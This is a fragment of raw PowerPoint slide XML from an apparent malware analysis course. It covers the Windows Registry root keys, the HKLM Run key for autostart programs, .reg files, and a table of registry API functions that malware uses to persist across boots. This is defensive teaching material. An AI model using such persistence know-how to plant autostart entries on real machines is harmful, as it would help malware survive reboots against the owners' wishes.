        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99119906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Registry</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Window Registry: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>sed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>to store OS and program configuration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>information, such </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>as settings </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>and options.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="Image result for windows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75" y="2348880"/>
            <a:ext cx="6048671" cy="416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5745" y="2965594"/>
            <a:ext cx="2613216" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ierarchical database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>5 top-level sections </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(HKEY)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Subkey</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Value Entry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Value (Data)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33862037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Registry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Registry Root Keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>HKEY_LOCAL_MACHINE (HKLM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Stores settings that are global to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>local machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>HKEY_CURRENT_USER (HKCU)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Stores settings specific to the current user</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>HKEY_CLASSES_ROOT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Stores information defining types</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>HKEY_CURRENT_CONFIG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Stores settings about the current hardware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>configuration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
              <a:t>HKEY_USERS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Defines settings for the default user, new users, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t>current users</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745024" y="5733256"/>
            <a:ext cx="7787416" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Registry Editor (regedit.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>): a built-in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Windows tool used to view and edit the registry </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11332651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Registry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Programs that Run Automatically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>HKLM\Software\Microsoft\Windows\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>CurrentVersion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>\Run</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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2391906"/>
            <a:ext cx="8819381" cy="4466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879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Registry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Common Registry Functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Malware often uses registry functions that are part of the Windows API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>modify the registry to run automatically when the system boots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Content Placeholder 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1539551416"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="179512" y="3212976"/>
          <a:ext cx="8783160" cy="3108960"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2378844"/>
                <a:gridCol w="2134772"/>
                <a:gridCol w="2134772"/>
                <a:gridCol w="2134772"/>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>RegCloseKey</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>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dirty="0" err="1">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>RegOpenKey</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>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RegConnectRegistry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dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>RegOpenKeyEx</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>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GB" dirty="0" err="1">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>RegCreateKey</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>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RegQueryInfoKey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RegCreateKeyEx</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RegQueryMultipleValues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GB" dirty="0" err="1">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>RegDeleteKey</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>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RegQueryValue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dirty="0" err="1">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>RegDeleteValue</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>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RegQueryValueEx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GB" dirty="0" err="1">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>RegEnumKey</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>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dirty="0" err="1"/>
                        <a:t>RegReplaceKey</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>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RegEnumKeyEx</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RegRestoreKey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GB"/>
                        <a:t>RegEnumValue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dirty="0" err="1"/>
                        <a:t>RegSaveKey</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>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RegFlushKey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RegSetKeySecurity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GB" dirty="0" err="1"/>
                        <a:t>RegGetKeySecurity</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>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dirty="0" err="1">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>RegSetValue</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>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RegLoadKey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RegSetValueEx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endParaRPr lang="en-GB"/>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a:t>RegNotifyChangeKeyValue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dirty="0" err="1"/>
                        <a:t>RegUnLoadKey</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>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GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:lnL w="9525" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="A2A9B1"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnT w="9525" cap="flat" cmpd="sng" algn="ctr">
                      <a:solidFill>
                        <a:srgbClr val="A2A9B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4126827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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Registry (Code Example)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>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34158"/>
            <a:ext cx="8614480" cy="5435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3736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Registry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Registry Scripting by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>a user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>double-clicks a .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>reg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> file, it automatically modifies the registry by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>merging the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>information the file contains into the registry</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>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756" y="3573016"/>
            <a:ext cx="6668138" cy="150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5982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15499</TotalTime>
  <Words>6579</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>1329</Paragraphs>
  <Slides>129</Slides>
  <Notes>26</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Office Theme</vt:lpstr>
      <vt:lpstr>Malware Analysis</vt:lpstr>
      <vt:lpstr>Bio</vt:lpstr>
      <vt:lpstr>Course Outline</vt:lpstr>
      <vt:lpstr>Text-books</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Existence &amp; Motivation </vt:lpstr>
      <vt:lpstr>Malware behaviour</vt:lpstr>
      <vt:lpstr>History Computer Virus &amp; Malware</vt:lpstr>
      <vt:lpstr>Types of Malware</vt:lpstr>
      <vt:lpstr>Botnet</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Real-world Impacts</vt:lpstr>
      <vt:lpstr>Security reports</vt:lpstr>
      <vt:lpstr>Security reports</vt:lpstr>
      <vt:lpstr>Security reports</vt:lpstr>
      <vt:lpstr>PE Headers and Sections</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PE Headers and Sections</vt:lpstr>
      <vt:lpstr>Packing and Obfuscation Techniques</vt:lpstr>
      <vt:lpstr>Packing and Obfuscation Techniques</vt:lpstr>
      <vt:lpstr>Packing and Obfuscation Techniques</vt:lpstr>
      <vt:lpstr>Unpacking</vt:lpstr>
      <vt:lpstr>Linked Libraries and Functions</vt:lpstr>
      <vt:lpstr>Linked Libraries and Functions</vt:lpstr>
      <vt:lpstr>Common DLLs</vt:lpstr>
      <vt:lpstr>Strings</vt:lpstr>
      <vt:lpstr>Strings</vt:lpstr>
      <vt:lpstr>Hash Function</vt:lpstr>
      <vt:lpstr>Malware Analysis</vt:lpstr>
      <vt:lpstr>Malware Analysis</vt:lpstr>
      <vt:lpstr>Malware Analysis</vt:lpstr>
      <vt:lpstr>Malware Analysis</vt:lpstr>
      <vt:lpstr>Malware Analysis</vt:lpstr>
      <vt:lpstr>Malware Analysis</vt:lpstr>
      <vt:lpstr>Malware Analysis</vt:lpstr>
      <vt:lpstr>Analysis Environment</vt:lpstr>
      <vt:lpstr>Tools</vt:lpstr>
      <vt:lpstr>Tools</vt:lpstr>
      <vt:lpstr>Surface Analysis </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Faking a Network</vt:lpstr>
      <vt:lpstr>Faking a Network</vt:lpstr>
      <vt:lpstr>Network Monitoring</vt:lpstr>
      <vt:lpstr>Network Monitoring</vt:lpstr>
      <vt:lpstr>Network Monitoring</vt:lpstr>
      <vt:lpstr>Practice 1 [Surface Analysis]</vt:lpstr>
      <vt:lpstr>Practice 2 [Pack &amp; Unpack]</vt:lpstr>
      <vt:lpstr>Practice 3 [Surface &amp; Dynamic Analysis]</vt:lpstr>
      <vt:lpstr>Practice 4 [Surface &amp; Dynamic Analysis]</vt:lpstr>
      <vt:lpstr>Disassembly</vt:lpstr>
      <vt:lpstr>Disassembly</vt:lpstr>
      <vt:lpstr>Disassembly</vt:lpstr>
      <vt:lpstr>Disassembly</vt:lpstr>
      <vt:lpstr>X86 Disassembly</vt:lpstr>
      <vt:lpstr>X86 Disassembly</vt:lpstr>
      <vt:lpstr>X86 Disassembly</vt:lpstr>
      <vt:lpstr>X86 Disassembly</vt:lpstr>
      <vt:lpstr>X86 Disassembly</vt:lpstr>
      <vt:lpstr>X86 Disassembly</vt:lpstr>
      <vt:lpstr>X86 Disassembly</vt:lpstr>
      <vt:lpstr>X86 Disassembly</vt:lpstr>
      <vt:lpstr>X86 Disassembly</vt:lpstr>
      <vt:lpstr>X86 Disassembly</vt:lpstr>
      <vt:lpstr>X86 Disassembly</vt:lpstr>
      <vt:lpstr>X86 Disassembly</vt:lpstr>
      <vt:lpstr>X86 Disassembly</vt:lpstr>
      <vt:lpstr>Recognizing C/C++ structure</vt:lpstr>
      <vt:lpstr>Recognizing C/C++ structure</vt:lpstr>
      <vt:lpstr>Recognizing C/C++ structure</vt:lpstr>
      <vt:lpstr>Recognizing C/C++ structure</vt:lpstr>
      <vt:lpstr>Recognizing C/C++ structure</vt:lpstr>
      <vt:lpstr>Recognizing C/C++ structure</vt:lpstr>
      <vt:lpstr>Practice 5</vt:lpstr>
      <vt:lpstr>Analyzing Malwares of Windows</vt:lpstr>
      <vt:lpstr>Windows API</vt:lpstr>
      <vt:lpstr>Windows API</vt:lpstr>
      <vt:lpstr>Windows API</vt:lpstr>
      <vt:lpstr>Windows API</vt:lpstr>
      <vt:lpstr>Windows API</vt:lpstr>
      <vt:lpstr>Windows API - Category</vt:lpstr>
      <vt:lpstr>Windows API - Category</vt:lpstr>
      <vt:lpstr>Windows API (E.g.)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Windows Registry</vt:lpstr>
      <vt:lpstr>Windows Registry</vt:lpstr>
      <vt:lpstr>Windows Registry</vt:lpstr>
      <vt:lpstr>Windows Registry</vt:lpstr>
      <vt:lpstr>Windows Registry (Code Example)</vt:lpstr>
      <vt:lpstr>Windows Registry</vt:lpstr>
      <vt:lpstr>Networking API</vt:lpstr>
      <vt:lpstr>Networking API (Code Example)</vt:lpstr>
      <vt:lpstr>Networking API</vt:lpstr>
      <vt:lpstr>Malware vs. Windows OS</vt:lpstr>
      <vt:lpstr>Malware vs. Windows OS</vt:lpstr>
      <vt:lpstr>Malware vs. Windows OS</vt:lpstr>
      <vt:lpstr>Malware vs. Windows OS</vt:lpstr>
